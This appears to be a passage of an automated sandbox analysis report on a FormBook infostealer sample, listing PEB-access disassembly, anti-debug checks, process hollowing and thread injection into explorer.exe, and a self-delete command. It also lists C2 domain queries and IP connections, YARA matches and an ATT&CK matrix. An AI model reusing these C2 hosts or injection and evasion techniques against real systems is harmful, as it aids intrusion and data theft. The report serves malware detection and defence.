          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A185 mov eax, dword ptr fs:[00000030h]7_2_0387A185
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C182 mov eax, dword ptr fs:[00000030h]7_2_0386C182
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]7_2_03872581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]7_2_03872581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]7_2_03872581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872581 mov eax, dword ptr fs:[00000030h]7_2_03872581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]7_2_03842D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]7_2_03842D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]7_2_03842D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]7_2_03842D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03842D8A mov eax, dword ptr fs:[00000030h]7_2_03842D8A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03872990 mov eax, dword ptr fs:[00000030h]7_2_03872990
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h]7_2_0387FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387FD9B mov eax, dword ptr fs:[00000030h]7_2_0387FD9B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038735A1 mov eax, dword ptr fs:[00000030h]7_2_038735A1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h]7_2_038761A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038761A0 mov eax, dword ptr fs:[00000030h]7_2_038761A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C69A6 mov eax, dword ptr fs:[00000030h]7_2_038C69A6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]7_2_03871DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]7_2_03871DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03871DB5 mov eax, dword ptr fs:[00000030h]7_2_03871DB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]7_2_038C51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]7_2_038C51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]7_2_038C51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C51BE mov eax, dword ptr fs:[00000030h]7_2_038C51BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]7_2_0384B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]7_2_0384B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B1E1 mov eax, dword ptr fs:[00000030h]7_2_0384B1E1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038D41E8 mov eax, dword ptr fs:[00000030h]7_2_038D41E8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h]7_2_0385D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385D5E0 mov eax, dword ptr fs:[00000030h]7_2_0385D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038F8DF1 mov eax, dword ptr fs:[00000030h]7_2_038F8DF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]7_2_03849100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]7_2_03849100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849100 mov eax, dword ptr fs:[00000030h]7_2_03849100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918D34 mov eax, dword ptr fs:[00000030h]7_2_03918D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]7_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]7_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]7_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov eax, dword ptr fs:[00000030h]7_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03864120 mov ecx, dword ptr fs:[00000030h]7_2_03864120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03853D34 mov eax, dword ptr fs:[00000030h]7_2_03853D34
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384AD30 mov eax, dword ptr fs:[00000030h]7_2_0384AD30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038CA537 mov eax, dword ptr fs:[00000030h]7_2_038CA537
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]7_2_03874D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]7_2_03874D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03874D3B mov eax, dword ptr fs:[00000030h]7_2_03874D3B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387513A mov eax, dword ptr fs:[00000030h]7_2_0387513A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387513A mov eax, dword ptr fs:[00000030h]7_2_0387513A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h]7_2_0386B944
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386B944 mov eax, dword ptr fs:[00000030h]7_2_0386B944
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03883D43 mov eax, dword ptr fs:[00000030h]7_2_03883D43
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3540 mov eax, dword ptr fs:[00000030h]7_2_038C3540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03867D50 mov eax, dword ptr fs:[00000030h]7_2_03867D50
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384C962 mov eax, dword ptr fs:[00000030h]7_2_0384C962
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h]7_2_0386C577
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386C577 mov eax, dword ptr fs:[00000030h]7_2_0386C577
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h]7_2_0384B171
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0384B171 mov eax, dword ptr fs:[00000030h]7_2_0384B171
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03849080 mov eax, dword ptr fs:[00000030h]7_2_03849080
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h]7_2_038C3884
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C3884 mov eax, dword ptr fs:[00000030h]7_2_038C3884
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385849B mov eax, dword ptr fs:[00000030h]7_2_0385849B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038890AF mov eax, dword ptr fs:[00000030h]7_2_038890AF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov ecx, dword ptr fs:[00000030h]7_2_0387F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h]7_2_0387F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387F0BF mov eax, dword ptr fs:[00000030h]7_2_0387F0BF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03918CD6 mov eax, dword ptr fs:[00000030h]7_2_03918CD6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]7_2_038DB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov ecx, dword ptr fs:[00000030h]7_2_038DB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]7_2_038DB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]7_2_038DB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]7_2_038DB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DB8D0 mov eax, dword ptr fs:[00000030h]7_2_038DB8D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_039014FB mov eax, dword ptr fs:[00000030h]7_2_039014FB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]7_2_038C6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]7_2_038C6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6CF0 mov eax, dword ptr fs:[00000030h]7_2_038C6CF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03914015 mov eax, dword ptr fs:[00000030h]7_2_03914015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03914015 mov eax, dword ptr fs:[00000030h]7_2_03914015
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]7_2_038C6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]7_2_038C6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]7_2_038C6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C6C0A mov eax, dword ptr fs:[00000030h]7_2_038C6C0A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h]7_2_03901C06
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]7_2_038C7016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]7_2_038C7016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h]7_2_038C7016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]7_2_0391740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]7_2_0391740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0391740D mov eax, dword ptr fs:[00000030h]7_2_0391740D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]7_2_0387002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]7_2_0387002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]7_2_0387002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]7_2_0387002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387002D mov eax, dword ptr fs:[00000030h]7_2_0387002D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387BC2C mov eax, dword ptr fs:[00000030h]7_2_0387BC2C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]7_2_0385B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]7_2_0385B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]7_2_0385B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h]7_2_0385B02A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0387A44B mov eax, dword ptr fs:[00000030h]7_2_0387A44B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03860050 mov eax, dword ptr fs:[00000030h]7_2_03860050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03860050 mov eax, dword ptr fs:[00000030h]7_2_03860050
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h]7_2_038DC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h]7_2_038DC450
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03902073 mov eax, dword ptr fs:[00000030h]7_2_03902073
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_03911074 mov eax, dword ptr fs:[00000030h]7_2_03911074
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0386746D mov eax, dword ptr fs:[00000030h]7_2_0386746D
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00409B30 LdrLoadDll,1_2_00409B30

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kxdrstone.com
          Source: C:\Windows\explorer.exeDomain query: www.financecreditpro.com
          Source: C:\Windows\explorer.exeDomain query: www.2377k.com
          Source: C:\Windows\explorer.exeDomain query: www.portale-accessi-anomali.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.9.90.226 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nurhalilah.xyz
          Source: C:\Windows\explorer.exeDomain query: www.uscryptomininglaws.com
          Source: C:\Windows\explorer.exeDomain query: www.healthcaresms.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.11.163 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.drive16pay.art
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lottochain.bet
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.148.98 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.smpldebts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 202.165.66.108 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 10D0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeMemory written: C:\Users\user\Desktop\DN_467842234567.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\DN_467842234567.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\DN_467842234567.exeProcess created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.677442024.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491743 Sample: DN_467842234567.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 31 www.byemreperde.com 2->31 33 www.21lawsofconfidence.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 11 DN_467842234567.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\rcgwzvp.dll, PE32 11->29 dropped 61 Detected unpacking (changes PE section rights) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 DN_467842234567.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 